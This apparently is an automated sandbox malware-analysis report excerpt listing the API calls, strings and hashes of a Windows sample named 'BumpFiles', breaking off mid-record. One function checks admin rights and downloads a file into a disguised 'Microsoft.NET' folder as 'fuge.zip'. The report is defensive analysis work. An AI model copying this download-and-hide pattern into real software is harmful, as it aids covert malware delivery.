                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Wait$CloseCodeExecuteExitHandleMultipleObjectObjectsProcessShellSingle
                                                                    • String ID: runas
                                                                    • API String ID: 1089270204-4000483414
                                                                    • Opcode ID: fbfe01764bf3bd133da6426b1707191181eb6e5d9c76948ec3c121628ac9f268
                                                                    • Instruction ID: cfef6ee1f5db3d8dbd30449f85d256f355e06a594c341b1f80d548b0f9f1c305
                                                                    • Opcode Fuzzy Hash: fbfe01764bf3bd133da6426b1707191181eb6e5d9c76948ec3c121628ac9f268
                                                                    • Instruction Fuzzy Hash: 36319EB1A04254DFDB01EF69D882A8ABBF9FF48310F50857AF801DB395D678DA41CB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040D5DC,?,?), ref: 0040D54E
                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040D5DC,?,?), ref: 0040D557
                                                                      • Part of subcall function 0040D3E4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040D442,?,00000001), ref: 0040D417
                                                                      • Part of subcall function 0040D3E4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040D442,?,00000001), ref: 0040D427
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                    • String ID:
                                                                    • API String ID: 3216391948-0
                                                                    • Opcode ID: 6d985cf35389fe99b6aefce10a28e4a55a65cc63afe30c83d0da8f23af8a3727
                                                                    • Instruction ID: 8863e0a287c16cdc3c28c396c55d2e72c7f1b10b95ecf773108c4199bfcc3fe4
                                                                    • Opcode Fuzzy Hash: 6d985cf35389fe99b6aefce10a28e4a55a65cc63afe30c83d0da8f23af8a3727
                                                                    • Instruction Fuzzy Hash: 5A114870A002099BDB04EF95C892AAEB7B5EF48304F50447BF904B73D2DB389E058A59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040D442,?,00000001), ref: 0040D417
                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040D442,?,00000001), ref: 0040D427
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: 1110422f23eefb4f4ddb778a27eb06d711fe7b6b4b1944915767f1634bda9307
                                                                    • Instruction ID: d95ccfb9285443909eeab24cd5826697557166218ec92875eff56e639bb6d067
                                                                    • Opcode Fuzzy Hash: 1110422f23eefb4f4ddb778a27eb06d711fe7b6b4b1944915767f1634bda9307
                                                                    • Instruction Fuzzy Hash: 06F08271904644AECB50FBB5CC9299EB7ACEF483187E045B7B404F22D2EA3CAF14995D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D22D,?,?), ref: 0040D041
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D,?,?), ref: 0040D08A
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D,?,?), ref: 0040D0AC
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040D0CA
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040D0E8
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040D106
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040D124
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D), ref: 0040D164
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001), ref: 0040D18F
                                                                    • RegCloseKey.ADVAPI32(?,0040D217,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001,Software\Embarcadero\Locales), ref: 0040D20A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                    • API String ID: 2701450724-3496071916
                                                                    • Opcode ID: 671aabb344a02d4a21f5d1e96b5259cc6b85b314e7807c62b9a1e8afea213112
                                                                    • Instruction ID: 96a9666c888c6573c04f77d76a58949e2d0052d2a9ed3862a85dc5018720b54c
                                                                    • Opcode Fuzzy Hash: 671aabb344a02d4a21f5d1e96b5259cc6b85b314e7807c62b9a1e8afea213112
                                                                    • Instruction Fuzzy Hash: C5510275E80608BFEB10EAD5CC46FAF73BCEB58704F5044BABA04F61C1D6789A448A5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004108FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID: Lld$lld
                                                                    • API String ID: 3997070919-3762902296
                                                                    • Opcode ID: 607d2351983e50f33505caff717241c6807bb6ddee907fbd5a450f9bc46cac13
                                                                    • Instruction ID: 3f85bfe050b3ea984b5aeb894ecb8602a3e2b9af0aebbdfc5bfded10294532e9
                                                                    • Opcode Fuzzy Hash: 607d2351983e50f33505caff717241c6807bb6ddee907fbd5a450f9bc46cac13
                                                                    • Instruction Fuzzy Hash: 14A17DB5A003099FDB14CFE8D890BEEB7B5BF59314F14412AE505AB381DBB8A9C4CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000,00000000), ref: 0040CCF2
                                                                    • LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000), ref: 0040CD16
                                                                    • LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000), ref: 0040CD25
                                                                    • IsValidLocale.KERNEL32(00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CD37
                                                                    • EnterCriticalSection.KERNEL32(00651C14,00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CD94
                                                                    • LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CDBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                    • String ID: en-GB,en,en-US,
                                                                    • API String ID: 975949045-3021119265
                                                                    • Opcode ID: dcfe28fe5da47c34272f0c7d91ae044fe9da86b6e61108bd54da0cc9d8f79f5b
                                                                    • Instruction ID: 257e64961a288cd264a0ffaab5fede5390936cc15f122fe2aa70ea45eab53adf
                                                                    • Opcode Fuzzy Hash: dcfe28fe5da47c34272f0c7d91ae044fe9da86b6e61108bd54da0cc9d8f79f5b
                                                                    • Instruction Fuzzy Hash: C021A1207C0700ABD710B7BA8C8276E359A9F46705F50853FB400BA2D3CA7D8C4597AE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    [Control-flow graph figure; legend: Executed / Not Executed]
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 004097AF
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID: 0Q@$8Q@$t5B
                                                                    • API String ID: 2882836952-4101180140
                                                                    • Opcode ID: bd1549fbf8f57001a698ec59130599b92d530f04859152d71de3bc48d7d6092a
                                                                    • Instruction ID: fa2ecaef7f14139ccfdb006b918d688549a946047fb110133aaf8be8ca82c4d5
                                                                    • Opcode Fuzzy Hash: bd1549fbf8f57001a698ec59130599b92d530f04859152d71de3bc48d7d6092a
                                                                    • Instruction Fuzzy Hash: 8D517B74A002058BDB24EF29D88475A7BE1BB49324F14857EE845AB3D3D778EC85CB19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • IsUserAnAdmin.SHELL32 ref: 00633424
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006334A4
                                                                      • Part of subcall function 00424F1C: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424F32
                                                                      • Part of subcall function 004258EC: CreateDirectoryW.KERNEL32(00000000,00000000,?,00633459,00000000,006334CB), ref: 004258F9
                                                                      • Part of subcall function 00633A38: Sleep.KERNEL32(0000012C,00000000,00633AEE), ref: 00633A6F
                                                                      • Part of subcall function 00633A38: URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00633A8C
                                                                      • Part of subcall function 00633A38: Sleep.KERNEL32(0000012C,0000012C,00000000,00633AEE), ref: 00633AC6
                                                                    Strings
                                                                    • C:\Program Files (x86)\Microsoft.NET\base, xrefs: 00633441, 0063344F
                                                                    • C:\Program Files (x86)\Microsoft.NET\fuge.zip, xrefs: 00633474
                                                                    • FDFB72E7E69C5772296516FA15ADE623EB5317D590422D9D39B841583F69654EB01771A93E3C6685ECFDAF5044207C47AF2A6011DCB4EB23065CF5F0950FAB, xrefs: 00633467
                                                                    Similarity
                                                                    • API ID: FileSleep$AdminAttributesCreateDirectoryDownloadMessageUser
                                                                    • String ID: C:\Program Files (x86)\Microsoft.NET\base$C:\Program Files (x86)\Microsoft.NET\fuge.zip$FDFB72E7E69C5772296516FA15ADE623EB5317D590422D9D39B841583F69654EB01771A93E3C6685ECFDAF5044207C47AF2A6011DCB4EB23065CF5F0950FAB
                                                                    • API String ID: 3215071381-4060426360
                                                                    • Opcode ID: f6837130be4614ce25fd961279331029222d47893cd0f967968c80173aceed89
                                                                    • Instruction ID: 8dad2de6a8b3dea3eefc5337c2ac44f97f3349aa0d5aad20445da69dd7c69d86
                                                                    • Opcode Fuzzy Hash: f6837130be4614ce25fd961279331029222d47893cd0f967968c80173aceed89
                                                                    • Instruction Fuzzy Hash: 9811B670600714AFD711FF61DD52ADE73EADB48304F90446AF401A7393DA39AF0187A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    [Control-flow graph figure; legend: Executed / Not Executed]
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005EDEB8
                                                                    • IsWindowUnicode.USER32 ref: 005EDECC
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005EDEEF
                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005EDF05
                                                                    • TranslateMessage.USER32 ref: 005EDF8A
                                                                    • DispatchMessageW.USER32 ref: 005EDF97
                                                                    • DispatchMessageA.USER32 ref: 005EDF9F
                                                                    Similarity
                                                                    • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                    • String ID:
                                                                    • API String ID: 2190272339-0
                                                                    • Opcode ID: 3098b82d3c33b3f691702e6728c507f08bf160ba0ef26f0c27fb9a5b6649148f
                                                                    • Instruction ID: 1e2ffcf5faaac0e623271d00fe91a0f5e8c3699351e3eb57bdfabddf9ae2a005
                                                                    • Opcode Fuzzy Hash: 3098b82d3c33b3f691702e6728c507f08bf160ba0ef26f0c27fb9a5b6649148f
                                                                    • Instruction Fuzzy Hash: 86210A30B547C065EA39B52B0C06BFEAFB96FD6704F14451DF4E29B2C2DA9D9C424236
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    [Control-flow graph figure; legend: Executed / Not Executed]
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005EE1C9
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005EE1E0
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: a032363e6cd12d6b15dd093dad1e4387557bbf03b2e8300dc75afd9b24e6e34b
                                                                    • Instruction ID: 49b3cee1a357ac9e4b63db1826b3323ea065a8a199be338292a45e01145cc57d
                                                                    • Opcode Fuzzy Hash: a032363e6cd12d6b15dd093dad1e4387557bbf03b2e8300dc75afd9b24e6e34b
                                                                    • Instruction Fuzzy Hash: AA418234A04684EFDB18CF69C886A9DBBF6FB49300F6185E5E850A7391C7349E41DB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    [Control-flow graph figure; legend: Executed / Not Executed]
                                                                    APIs
                                                                    • GetUserDefaultUILanguage.KERNEL32(00000000,0040D6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D786,00000000,?,00000105), ref: 0040D693
                                                                    • GetSystemDefaultUILanguage.KERNEL32(00000000,0040D6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D786,00000000,?,00000105), ref: 0040D6BB
                                                                    Similarity
                                                                    • API ID: DefaultLanguage$SystemUser
                                                                    • String ID:
                                                                    • API String ID: 384301227-0
                                                                    • Opcode ID: 8a2bd1881834e6a44c33d5fad18fbb006ed95a30fdac29b3a3123759fe5b540d
                                                                    • Instruction ID: dba43ac39d730306daca4e1ada09fe9982239cc22dcd487a1f983162ddf5979f
                                                                    • Opcode Fuzzy Hash: 8a2bd1881834e6a44c33d5fad18fbb006ed95a30fdac29b3a3123759fe5b540d
                                                                    • Instruction Fuzzy Hash: 4231FE34E042099BDB10EBE5C881BAEB7B5AB48308F50487BE414B73D1DB79AD49CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D748
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D799
                                                                    Similarity
                                                                    • API ID: FileLibraryLoadModuleName
                                                                    • String ID:
                                                                    • API String ID: 1159719554-0
                                                                    • Opcode ID: 2b18c3781ee66c6b53a5173a8fe35087fbd537bb29e21f2de5c79d474cbb7333
                                                                    • Instruction ID: 8aa48a9f0ad89ad4cad376e89223919de5cbdd47df10d573a1ffb6370790ae73
                                                                    • Opcode Fuzzy Hash: 2b18c3781ee66c6b53a5173a8fe35087fbd537bb29e21f2de5c79d474cbb7333
                                                                    • Instruction Fuzzy Hash: D8114270A4021CAFDB14EB64CC86BDE73B8DB44704F5144BAB508B72D1DA785E858A59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CompareStringW.KERNEL32(0000007F,00000001,00000000,00000000,00000000,00000000,00000000,00407D6A,?,?,?,00000000), ref: 00407D49
                                                                    Similarity
                                                                    • API ID: CompareString
                                                                    • String ID:
                                                                    • API String ID: 1825529933-0
                                                                    • Opcode ID: 41aa4a8758972083fda76d886b23328867988b7c9d560f1c8c924052a9eedc68
                                                                    • Instruction ID: 875274e2c4264f451e6ad1d12119ad3db8eed83e6ea6ef1fa48c92378bfb3a92
                                                                    • Opcode Fuzzy Hash: 41aa4a8758972083fda76d886b23328867988b7c9d560f1c8c924052a9eedc68
                                                                    • Instruction Fuzzy Hash: E5F0AF756486447EDB11F779CC82E5E73ACDF88704B2104BAF400F2292E6BD5E04962A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 428 40c498-40c4a6 429 40c4d3-40c4de 428->429 430 40c4a8-40c4bf GetModuleFileNameW call 40d70c 428->430 432 40c4c4-40c4cb 430->432 432->429 433 40c4cd-40c4d0 432->433 433->429
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00400000,?,0000020A), ref: 0040C4B6
                                                                      • Part of subcall function 0040D70C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D748
                                                                      • Part of subcall function 0040D70C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D799
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName$LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 4113206344-0
                                                                    • Opcode ID: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
                                                                    • Instruction ID: 3a4ae58969193307bce1041edd5d9d761091ef52682c61390113b32e0b793339
                                                                    • Opcode Fuzzy Hash: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
                                                                    • Instruction Fuzzy Hash: 92E0ED71A00310DBCB10DFA8D8C5A5737E4AB08754F0446A6ED14DF386D375DD1487D5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    • Opcode ID: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                    • Instruction ID: c9d0dbab03ec1449dfd6cadc3055f85912d320d9fe12348b59d5370955ded952
                                                                    • Opcode Fuzzy Hash: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                    • Instruction Fuzzy Hash: 3DA012244089001AC404A7197C4340F31805D41114FC40B68745CB52C2E619C5640BDB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,00405C63), ref: 00405663
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: d6471b694c53482f29af37f4d684f3e9f2dc181e884f57fe696aea683e58fed0
                                                                    • Instruction ID: 7b51e7b86078a4719c2a56ad589d93d8956ad9d8034c142f37d3783c14cff872
                                                                    • Opcode Fuzzy Hash: d6471b694c53482f29af37f4d684f3e9f2dc181e884f57fe696aea683e58fed0
                                                                    • Instruction Fuzzy Hash: EEF0AFF2B013018FE7549F789D417027BD6E705354F10817EE90DEBB98D7B088418B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 0040CE35
                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040CE46
                                                                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 0040CF46
                                                                    • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 0040CF58
                                                                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 0040CF64
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 0040CFA9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                    • String ID: GetLongPathNameW$\$kernel32.dll
                                                                    • API String ID: 1930782624-3908791685
                                                                    • Opcode ID: 1b30c6aa4afaed83ea31088e8fb335b792bc7b3c0a28b9d7d69bc162d0d5a7e3
                                                                    • Instruction ID: df3eba0b7ab91270250ab933d467d2b4ce9c97f00ef9e3a73738d7b4f4df9431
                                                                    • Opcode Fuzzy Hash: 1b30c6aa4afaed83ea31088e8fb335b792bc7b3c0a28b9d7d69bc162d0d5a7e3
                                                                    • Instruction Fuzzy Hash: D2417332E00519DBCB10EB68CCC5ADEB3B6AF44314F1486B6A504F72D1E7789E45DA89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005E0EA2
                                                                    • IsIconic.USER32(?), ref: 005E0ED0
                                                                    • IsWindowVisible.USER32(?), ref: 005E0EE0
                                                                    • ShowWindow.USER32(?,00000000,00000000,?,?,?,005EE203,?,006551D0), ref: 005E0EFD
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005E0F10
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005E0F21
                                                                    • ShowWindow.USER32(?,00000006,00000000,?,?,?,005EE203,?,006551D0), ref: 005E0F41
                                                                    • ShowWindow.USER32(?,00000005,00000000,?,?,?,005EE203,?,006551D0), ref: 005E0F4B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Window$LongShow$IconicVisible
                                                                    • String ID:
                                                                    • API String ID: 3484284227-0
                                                                    • Opcode ID: 153ce922c674a532d80c97f86a4cd859b1415a9a321f720c0de561082abaa5d9
                                                                    • Instruction ID: fc07e678b8b521b91e32f980c44dac548b3b61d93d6eebad58e43b97ab7ab2bd
                                                                    • Opcode Fuzzy Hash: 153ce922c674a532d80c97f86a4cd859b1415a9a321f720c0de561082abaa5d9
                                                                    • Instruction Fuzzy Hash: B1113A2210EAD074D23A32371C02FEF1E985FD3324F18892EF1E8E50C2C26C89C5822B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNEL32(0000012C,00000000,00633AEE), ref: 00633A6F
                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00633A8C
                                                                    • Sleep.KERNEL32(0000012C,0000012C,00000000,00633AEE), ref: 00633AC6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$DownloadFile
                                                                    • String ID: dWe$hWe
                                                                    • API String ID: 2087964873-58362703
                                                                    • Opcode ID: 04cbe2486e640521b758a2ff6ddd802f746ddcb316689a65afaa4eebd1ce7cdd
                                                                    • Instruction ID: e38bbcdaf700aa6aab6cb9e7a4f3a98896630684cfae030678e04ef5b335f524
                                                                    • Opcode Fuzzy Hash: 04cbe2486e640521b758a2ff6ddd802f746ddcb316689a65afaa4eebd1ce7cdd
                                                                    • Instruction Fuzzy Hash: 62113D74600204AFD700EB55C892E8D77B5EF4A344F504076F504AB3E2D779AE019A99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • IsValidLocale.KERNEL32(?,00000002,00000000,0040CB21,?,?,?,00000000), ref: 0040CA66
                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040CB21,?,?,?,00000000), ref: 0040CA82
                                                                    • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040CB21,?,?,?,00000000), ref: 0040CA93
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$Info$Valid
                                                                    • String ID:
                                                                    • API String ID: 1826331170-0
                                                                    • Opcode ID: ad3de78e447f79a9d5c8a36d098a659f3a87ca39114a4d2c18dd351f82df870f
                                                                    • Instruction ID: 32193daf775a97d202d3fb3a0b5ab3bed95078009c6c530a1f27204a2a6a35ae
                                                                    • Opcode Fuzzy Hash: ad3de78e447f79a9d5c8a36d098a659f3a87ca39114a4d2c18dd351f82df870f
                                                                    • Instruction Fuzzy Hash: AD319E34A0061CEBDB20DF55DCC2B9EB7B6EB49701F5042BAA508B32D1D6396E80CE59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Version
                                                                    • String ID:
                                                                    • API String ID: 1889659487-0
                                                                    • Opcode ID: 1cd4377a6b1d967cc78fa149afafeeac03ff185f122abd55826d7edf55432034
                                                                    • Instruction ID: 7420d91a343197e2725c1ed6fdd5669b345e5498412afaef9b1ca0b30dea7431
